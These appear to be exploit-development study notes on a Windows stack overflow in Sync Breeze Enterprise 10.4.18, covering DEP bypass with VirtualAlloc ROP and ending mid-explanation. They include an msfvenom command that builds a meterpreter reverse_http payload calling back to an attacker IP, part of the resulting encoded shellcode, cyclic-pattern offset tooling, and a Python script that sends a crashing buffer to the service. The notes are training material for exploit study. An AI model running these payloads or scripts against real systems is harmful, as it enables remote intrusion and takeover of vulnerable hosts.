Problem

The problem is that we generated shellcode with msfvenom that avoids several bad characters:

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.119.120 LPORT=8080 -b "\x00\x09\x0a\x0b\x0c\x0d\x20" -f python -v shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with Encoding failed due to a bad character (index=667, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 714 (iteration=0)
x86/call4_dword_xor chosen with final size 714
Payload size: 714 bytes
Final size of python file: 3978 bytes
shellcode =  b""
shellcode += b"\x33\xc9\x66\x81\xe9\x54\xff\xe8\xff\xff\xff"
shellcode += b"\xff\xc0\x5e\x81\x76\x0e\xa4\x94\xf7\xb3\x83"
shellcode += b"\xee\xfc\xe2\xf4\x58\x7c\x78\xb3\xa4\x94\x97"
shellcode += b"\x82\x76\x1d\x12\xd7\x2f\xc6\xc7\x38\xf6\x98"
shellcode += b"\x7c\xe1\xb0\x9b\x40\xf9\x82\x1f\x85\x9b\x95"
shellcode += b"\x6b\xc6\x73\x08\xa8\x96\xcf\xa6\xb8\xd7\x72"
shellcode += b"\x6b\x99\xf6\x74\xed\xe1\x18\xe1\xf3\x1f\xa5"
shellcode += b"\xa3\x2f\xd6\xcb\xb2\x74\x1f\xb7\xcb\x21\x54"

This shellcode contains a decoder stub: several instructions that "decode" its own code, replacing some bytes with others (in effect, restoring the original payload). To do that, it must write to the address where it is stored, which causes an error when the code cave does not have write permissions, which is the case here:

Locating the crash

Generate a cyclic pattern with Kali (msf-pattern_create) or with an online generator. Send the pattern as the payload and determine the offset at which the crash occurs. Once the offset is located, fill the buffer up to that offset with A's.

msf-pattern_create -l 2600

At the crash, EIP will hold four bytes of the pattern. Pass that value to msf-pattern_offset to obtain the exact offset:

msf-pattern_offset -l 2600 -q "TBD_EIP"
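To make the offset computation concrete, here is an added example (not part of the original post) that reimplements the behaviour of msf-pattern_create and msf-pattern_offset in Python; the function names and the sample EIP value are my own, chosen so the calculation can be checked by hand:

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Build the cyclic pattern msf-pattern_create emits (Aa0Aa1Aa2...Zz9),
    truncated to `length` bytes. Every 4-byte window is unique for the
    first 20280 bytes, so any EIP value maps back to one offset."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(query: str, length: int = 2600) -> int:
    """Return the offset of `query` inside the pattern, or -1 if absent.

    `query` is either the 8-hex-digit EIP value shown by the debugger
    (e.g. "41316141", which is little-endian on x86 and so is unpacked
    before searching) or the raw 4-character string it represents."""
    pattern = pattern_create(length)
    if len(query) == 8 and all(c in string.hexdigits for c in query):
        needle = struct.pack("<I", int(query, 16))  # reverse little-endian
    else:
        needle = query.encode()
    return pattern.find(needle)


if __name__ == "__main__":
    # Constructed example: EIP = 0x41316141 corresponds to the bytes
    # "Aa1A", which start at offset 3 of the pattern.
    print(pattern_create(12))           # b'Aa0Aa1Aa2Aa3'
    print(pattern_offset("41316141"))   # 3
    print(pattern_offset("41414141"))   # -1, "AAAA" is not in the pattern
```

A result of -1 means the crash did not land on the pattern (for example EIP still holds an address), so the overwrite is not a clean, direct control of EIP.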

ROP Lore

Why is ROP needed

Classic buffer overflows achieve arbitrary code execution by redirecting the execution flow to something on the stack (which is normally also user-controlled). However, a normal program never needs to transfer execution to the stack, since the code being executed lives in the .text section of the binary. The stack is used to store and manage local variables and function parameters.

VirtualAlloc ROP

Let’s see how we can use VirtualAlloc to bypass DEP. VirtualAlloc is a Windows API function that can reserve, commit, or change the state of a region of pages in the virtual address space of the calling process. We are going to invoke VirtualAlloc by placing a skeleton of the function call on the stack through the buffer overflow, modifying its address and parameters through ROP, and then return into it. The skeleton should contain the VirtualAlloc address followed by the return address (which should be our shellcode) and the arguments for the function call. Let’s see the skeleton of VirtualAlloc:

Analyzing public exploit

  • Vulnerable Binary: Sync Breeze Enterprise v10.4.18

Let’s try to use the public exploit to trigger a crash:

#!/usr/bin/python
import socket
import sys
from struct import pack

try:
    server = "192.168.122.113"
    port = 9121
    size = 1000
    inputBuffer = b"\x41" * size             # 1000 "A" bytes as the payload

    # Header that precedes the payload on the wire
    header = b"\x75\x19\xba\xab"
    header += b"\x03\x00\x00\x00"
    header += b"\x00\x40\x00\x00"
    header += pack('<I', len(inputBuffer))   # payload length, little-endian
    header += pack('<I', len(inputBuffer))
    header += pack('<I', inputBuffer[-1])    # last byte of the payload

    buf = header + inputBuffer
    print("Sending evil buffer...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((server, port))
    s.send(buf)
    s.close()

    print("Done!")
except socket.error:
    print("Could not connect!")

When we run the exploit, we see that the EAX register is overwritten but EIP is not. It seems that, at this point, EIP is not directly under our control. There is, however, data on the stack that contains part of our payload:
